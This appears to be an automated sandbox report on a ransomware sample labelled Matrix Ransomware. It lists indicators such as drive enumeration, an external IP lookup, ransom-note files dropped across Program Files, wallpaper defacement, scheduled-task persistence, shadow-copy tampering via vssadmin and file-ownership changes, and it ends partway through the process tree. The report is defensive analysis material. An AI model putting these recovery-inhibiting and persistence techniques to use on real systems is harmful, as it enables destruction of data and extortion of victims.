deNx4JD364.exe0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File opened (read-only)	\??\O:	deNx4JD364.exe
File opened (read-only)	\??\Y:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\T:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\O:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\G:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\A:	deNx4JD364.exe
File opened (read-only)	\??\E:	deNx4JD364.exe
File opened (read-only)	\??\H:	deNx4JD364.exe
File opened (read-only)	\??\V:	deNx4JD364.exe
File opened (read-only)	\??\S:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\I:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	deNx4JD364.exe
File opened (read-only)	\??\L:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\K:	deNx4JD364.exe
File opened (read-only)	\??\T:	deNx4JD364.exe
File opened (read-only)	\??\U:	deNx4JD364.exe
File opened (read-only)	\??\U:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\P:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\E:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\R:	deNx4JD364.exe
File opened (read-only)	\??\Z:	deNx4JD364.exe
File opened (read-only)	\??\R:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Q:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\J:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\B:	deNx4JD364.exe
File opened (read-only)	\??\G:	deNx4JD364.exe
File opened (read-only)	\??\Q:	deNx4JD364.exe
File opened (read-only)	\??\X:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\H:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\I:	deNx4JD364.exe
File opened (read-only)	\??\L:	deNx4JD364.exe
File opened (read-only)	\??\N:	deNx4JD364.exe
File opened (read-only)	\??\P:	deNx4JD364.exe
File opened (read-only)	\??\Z:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\N:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\K:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	deNx4JD364.exe
File opened (read-only)	\??\S:	deNx4JD364.exe
File opened (read-only)	\??\W:	deNx4JD364.exe
File opened (read-only)	\??\W:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\V:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\X:	deNx4JD364.exe
File opened (read-only)	\??\Y:	deNx4JD364.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

153 myexternalip.com

flow	ioc
153	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\SLqXTAxH.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-ms	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-180.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner.svg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover_2x.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProDemoR_BypassTrial180-ppd.xrm-ms	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\HeartbeatConfig.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\external_extensions.json	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_features_email.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-heapwalker.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-io.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\index_poster.jpg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Trial-pl.xrm-ms	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\nb-no\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrome.7z	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\org-openide-filesystems_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\onenote.x-none.msi.16.x-none.vreg.dat	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\TrebuchetMs.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\error-icon.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ko-kr\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2.16.White.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons_retina.png	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\hijrah-config-umalqura.properties	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5664 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

6496 vssadmin.exe

pid	process
5664	schtasks.exe

pid	process
6496	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exedeNx4JD364.exe

pid	process
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe
5372	deNx4JD364.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

deNx4JD364.exe

pid process

5372 deNx4JD364.exe

pid	process
5372	deNx4JD364.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

powershell.exetakeown.exedeNx4JD364.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeDebugPrivilege	5372	deNx4JD364.exe
Token: SeLoadDriverPrivilege	5372	deNx4JD364.exe
Token: SeBackupPrivilege	5456	vssvc.exe
Token: SeRestorePrivilege	5456	vssvc.exe
Token: SeAuditPrivilege	5456	vssvc.exe
Token: SeIncreaseQuotaPrivilege	6288	WMIC.exe
Token: SeSecurityPrivilege	6288	WMIC.exe
Token: SeTakeOwnershipPrivilege	6288	WMIC.exe
Token: SeLoadDriverPrivilege	6288	WMIC.exe
Token: SeSystemProfilePrivilege	6288	WMIC.exe
Token: SeSystemtimePrivilege	6288	WMIC.exe
Token: SeProfSingleProcessPrivilege	6288	WMIC.exe
Token: SeIncBasePriorityPrivilege	6288	WMIC.exe
Token: SeCreatePagefilePrivilege	6288	WMIC.exe
Token: SeBackupPrivilege	6288	WMIC.exe
Token: SeRestorePrivilege	6288	WMIC.exe
Token: SeShutdownPrivilege	6288	WMIC.exe
Token: SeDebugPrivilege	6288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6288	WMIC.exe
Token: SeRemoteShutdownPrivilege	6288	WMIC.exe
Token: SeUndockPrivilege	6288	WMIC.exe
Token: SeManageVolumePrivilege	6288	WMIC.exe
Token: 33	6288	WMIC.exe
Token: 34	6288	WMIC.exe
Token: 35	6288	WMIC.exe
Token: 36	6288	WMIC.exe
Token: SeIncreaseQuotaPrivilege	6288	WMIC.exe
Token: SeSecurityPrivilege	6288	WMIC.exe
Token: SeTakeOwnershipPrivilege	6288	WMIC.exe
Token: SeLoadDriverPrivilege	6288	WMIC.exe
Token: SeSystemProfilePrivilege	6288	WMIC.exe
Token: SeSystemtimePrivilege	6288	WMIC.exe
Token: SeProfSingleProcessPrivilege	6288	WMIC.exe
Token: SeIncBasePriorityPrivilege	6288	WMIC.exe
Token: SeCreatePagefilePrivilege	6288	WMIC.exe
Token: SeBackupPrivilege	6288	WMIC.exe
Token: SeRestorePrivilege	6288	WMIC.exe
Token: SeShutdownPrivilege	6288	WMIC.exe
Token: SeDebugPrivilege	6288	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6288	WMIC.exe
Token: SeRemoteShutdownPrivilege	6288	WMIC.exe
Token: SeUndockPrivilege	6288	WMIC.exe
Token: SeManageVolumePrivilege	6288	WMIC.exe
Token: 33	6288	WMIC.exe
Token: 34	6288	WMIC.exe
Token: 35	6288	WMIC.exe
Token: 36	6288	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.execmd.execmd.execmd.execmd.execmd.exedeNx4JD3.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1348 wrote to memory of 2576	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 2576	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 2576	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 4288	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWpUUoXa.exe
PID 1348 wrote to memory of 4288	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWpUUoXa.exe
PID 1348 wrote to memory of 4288	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	NWpUUoXa.exe
PID 1348 wrote to memory of 5072	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 5072	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 5072	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 5072 wrote to memory of 1636	5072	cmd.exe	powershell.exe
PID 5072 wrote to memory of 1636	5072	cmd.exe	powershell.exe
PID 5072 wrote to memory of 1636	5072	cmd.exe	powershell.exe
PID 1348 wrote to memory of 3944	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 3944	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 3944	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 536	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 536	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 536	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3944 wrote to memory of 4272	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 4272	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 4272	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 1220	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 1220	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 1220	3944	cmd.exe	reg.exe
PID 536 wrote to memory of 3544	536	cmd.exe	wscript.exe
PID 536 wrote to memory of 3544	536	cmd.exe	wscript.exe
PID 536 wrote to memory of 3544	536	cmd.exe	wscript.exe
PID 1348 wrote to memory of 1884	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 1884	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 1348 wrote to memory of 1884	1348	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	cmd.exe
PID 3944 wrote to memory of 4848	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 4848	3944	cmd.exe	reg.exe
PID 3944 wrote to memory of 4848	3944	cmd.exe	reg.exe
PID 1884 wrote to memory of 5788	1884	cmd.exe	attrib.exe
PID 1884 wrote to memory of 5788	1884	cmd.exe	attrib.exe
PID 1884 wrote to memory of 5788	1884	cmd.exe	attrib.exe
PID 1884 wrote to memory of 1620	1884	cmd.exe	cacls.exe
PID 1884 wrote to memory of 1620	1884	cmd.exe	cacls.exe
PID 1884 wrote to memory of 1620	1884	cmd.exe	cacls.exe
PID 1884 wrote to memory of 5084	1884	cmd.exe	takeown.exe
PID 1884 wrote to memory of 5084	1884	cmd.exe	takeown.exe
PID 1884 wrote to memory of 5084	1884	cmd.exe	takeown.exe
PID 1884 wrote to memory of 5448	1884	cmd.exe	cmd.exe
PID 1884 wrote to memory of 5448	1884	cmd.exe	cmd.exe
PID 1884 wrote to memory of 5448	1884	cmd.exe	cmd.exe
PID 5448 wrote to memory of 5356	5448	cmd.exe	deNx4JD3.exe
PID 5448 wrote to memory of 5356	5448	cmd.exe	deNx4JD3.exe
PID 5448 wrote to memory of 5356	5448	cmd.exe	deNx4JD3.exe
PID 5356 wrote to memory of 5372	5356	deNx4JD3.exe	deNx4JD364.exe
PID 5356 wrote to memory of 5372	5356	deNx4JD3.exe	deNx4JD364.exe
PID 3544 wrote to memory of 2024	3544	wscript.exe	cmd.exe
PID 3544 wrote to memory of 2024	3544	wscript.exe	cmd.exe
PID 3544 wrote to memory of 2024	3544	wscript.exe	cmd.exe
PID 2024 wrote to memory of 5664	2024	cmd.exe	schtasks.exe
PID 2024 wrote to memory of 5664	2024	cmd.exe	schtasks.exe
PID 2024 wrote to memory of 5664	2024	cmd.exe	schtasks.exe
PID 3544 wrote to memory of 5168	3544	wscript.exe	cmd.exe
PID 3544 wrote to memory of 5168	3544	wscript.exe	cmd.exe
PID 3544 wrote to memory of 5168	3544	wscript.exe	cmd.exe
PID 5168 wrote to memory of 5668	5168	cmd.exe	schtasks.exe
PID 5168 wrote to memory of 5668	5168	cmd.exe	schtasks.exe
PID 5168 wrote to memory of 5668	5168	cmd.exe	schtasks.exe
PID 3852 wrote to memory of 6496	3852	cmd.exe	vssadmin.exe
PID 3852 wrote to memory of 6496	3852	cmd.exe	vssadmin.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

5788 attrib.exe

pid	process
5788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
"C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1348
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe"
  2⤵
  PID:2576
- C:\Users\Admin\AppData\Local\Temp\NWpUUoXa.exe
